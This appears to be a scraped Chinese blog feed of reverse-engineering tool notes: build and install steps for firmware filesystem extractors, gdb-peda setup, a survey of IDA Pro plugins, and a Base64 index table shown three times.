rm -rf squashfs4.3
tar -zxvf squashfs4.3.tar.gz
cd squashfs4.3
patch -p0 < ../patches/patch0.txt
cd squashfs-tools
cd LZMA/lzmadaptive/C/7zip/Compress/LZMA/
mv LZMA.h LZMA2.h
cd ../../../../../../LZMA/lzmalt/
mv LZMA.h LZMA3.h
cd ../../
sed -i "s/#include \"LZMA.h\"/#include \"LZMA2.h\"/g" LZMA/lzmadaptive/C/7zip/Compress/LZMA/LZMADecoder.h
sed -i "s/#include \"LZMA.h\"/#include \"LZMA2.h\"/g" LZMA/lzmadaptive/C/7zip/Compress/LZMA/LZMAEncoder.h
sed -i "s/#include \"LZMA.h\"/#include \"LZMA3.h\"/g" LZMA/lzmalt/LZMADecoder.h
make
cp ./sasquatch ~/.local/bin
cd ../../../
rm -rf sasquatch

安装 jefferson

jefferson 用于提取 JFFS2 文件系统

sudo apt install liblzma-dev
pip2 install pyliblzma cstruct --user
pip2 install git+https://github.com/sviehb/jefferson.git --user

安装 ubi_reader

ubi_reader 用于提取 UBIFS 文件系统

ubi_reader 在更新后增加了错误检查, 有些 UBIFS 提取时会会因为 “Added fatal error check if UBI block extends beyond file size” 中断

commit:

https://github.com/jrspruitt/ubi_reader/commit/af678a5234dc891e8721ec985b1a6e74c77620b6)

由于本人有强迫症, 旧版 ubi_reader 不支持 python3, 因此直接安装的新版, 碰上问题再说吧

sudo apt install liblzo2-dev
pip3 install python-lzo
pip3 install git+https://github.com/jrspruitt/ubi_reader.git --user

安装 yaffshiv

安装 yaffshiv 用于提取 YAFFS 文件系统

pip2 install git+https://github.com/devttys0/yaffshiv --user

安装 unstuff 提取 StuffIt 档案文件

这玩意是闭源的, 没有 x64 版本

mkdir -p /tmp/unstuff
cd /tmp/unstuff
wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv
cp bin/unstuff ~/.local/bin
cd -
rm -rf /tmp/unstuff

]]> technical binary tools 使用GDB /technical/binary/tools/use-gdb/ 作为一个pwn选手，一个好的动态调试工具肯定少不了，但是linux下并没有OD这样神奇的东西（edb除外），除了ida的远程调试工具外最好的选择就是gdb了。

安装gdb-peda

在调试的时候，原版的gdb使用起来总感觉不是那么舒服，虽然有layout，但是会有一些奇奇怪怪的问题，这个时候选择一个好用的插件便会方便许多，本文选择的是gdb-peda
安装过程十分简单，以安装在～/peda为例，有别的需求可自己更改

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

写作业去了，有空填坑

]]> technical binary tools 科学使用 IDA /technical/binary/tools/use-ida/ ida作为工业级的逆向分析工具，尤其是其F5这个让人增寿的东西，若是正确使用，则可以为分析者节省下大把时间。

注：本文默认IDA版本均为IDA7.0以及以上

解决堆栈平衡，花指令

在如下文章有详细介绍

[XDCTF-2017] destory

IDA python

挖坑待填

插件

Python_editor

注：现在懒得装了

在IDA中编写python脚本简直反人类，若是需要运行一个python脚本还是比较麻烦的，打上了这个插件后可以很方便的编写以及运行python脚本

安装

安装需要 Qscilla 模块，具体的安装比较复杂，作者已经帮忙打包好了一个装好所有依赖的python，需要从该链接下载 Pyqt5 ida pro 7.0
用下载好的 python 替换电脑本身的 python （做不做备份看心情吧）
从 PyQt5 中提取 Qt5Core.dll , Qt5Gui.dll, Qt5widgets.dll 覆盖到 IDA目录下
删去 IDA 目录下 python 文件夹中的 sip.pyd 和 PyQt5 目录（不删除分别会导致 IDA崩溃，无法正确识别PyQt5）
添加环境变量 QT_QPA_PLATFORM_PLUGIN_PATH=Python目录\Lib\site-packages\PyQt5\plugins\platforms （没加好像会出现 a plugin “” not found）

截图

运行Python脚本

运行python脚本

自动补全

Keypatch

ida自身内建的补丁工具极其的难用，同时它只支持x86的汇编，打上这个插件后，修改汇编将会方便许多，可以直接按下 Ctrl+Alt+K 进行修改。

安装

下载并安装 keystone(python版 IDA7.0需要安装x64的) 下载地址: keystone
将 keypatch.py 拷贝到 IDA 的插件目录

截图

keypatch

Hexlight

高亮各种括号

https://bbs.pediy.com/thread-226099.htm

dwaf

ida 7.0自带的一个插件

jmp to next fixup

寻找下一个fixup的地址

比如got表以及windows的重定位

change the callee address

该插件允许用户改变called函数的地址

例如

call rax

实际上就是加个注释和交叉引用

可以把动态调试时的地址填入

x64dbgida

安装

https://github.com/x64dbg/x64dbgida

功能

同步x64dbg和ida之间的数据

diaphora

https://github.com/joxeankoret/diaphora

尚未使用

LazyIDA

强烈安利

安装

https://github.com/L4ys/LazyIDA

功能

移除return type

将数据转换为各种语言的数据

扫描格式化字符串漏洞

双击跳转到虚表函数

快捷键：

w 复制当前地址

c 复制当前item的名字

v 移除当前item的返回值

]]> technical binary tools

索引	对应字符	索引	对应字符	索引	对应字符	索引	对应字符
0	A	17	R	34	i	51	z
1	B	18	S	35	j	52	0
2	C	19	T	36	k	53	1
3	D	20	U	37	l	54	2
4	E	21	V	38	m	55	3
5	F	22	W	39	n	56	4
6	G	23	X	40	o	57	5
7	H	24	Y	41	p	58	6
8	I	25	Z	42	q	59	7
9	J	26	a	43	r	60	8
10	K	27	b	44	s	61	9
11	L	28	c	45	t	62	+
12	M	29	d	46	u	63	/
13	N	30	e	47	v
14	O	31	f	48	w
15	P	32	g	49	x
16	Q	33	h	50	y

索引	对应字符	索引	对应字符	索引	对应字符	索引	对应字符
0	A	17	R	34	i	51	z
1	B	18	S	35	j	52	0
2	C	19	T	36	k	53	1
3	D	20	U	37	l	54	2
4	E	21	V	38	m	55	3
5	F	22	W	39	n	56	4
6	G	23	X	40	o	57	5
7	H	24	Y	41	p	58	6
8	I	25	Z	42	q	59	7
9	J	26	a	43	r	60	8
10	K	27	b	44	s	61	9
11	L	28	c	45	t	62	+
12	M	29	d	46	u	63	/
13	N	30	e	47	v
14	O	31	f	48	w
15	P	32	g	49	x
16	Q	33	h	50	y

索引	对应字符	索引	对应字符	索引	对应字符	索引	对应字符
0	A	17	R	34	i	51	z
1	B	18	S	35	j	52	0
2	C	19	T	36	k	53	1
3	D	20	U	37	l	54	2
4	E	21	V	38	m	55	3
5	F	22	W	39	n	56	4
6	G	23	X	40	o	57	5
7	H	24	Y	41	p	58	6
8	I	25	Z	42	q	59	7
9	J	26	a	43	r	60	8
10	K	27	b	44	s	61	9
11	L	28	c	45	t	62	+
12	M	29	d	46	u	63	/
13	N	30	e	47	v
14	O	31	f	48	w
15	P	32	g	49	x
16	Q	33	h	50	y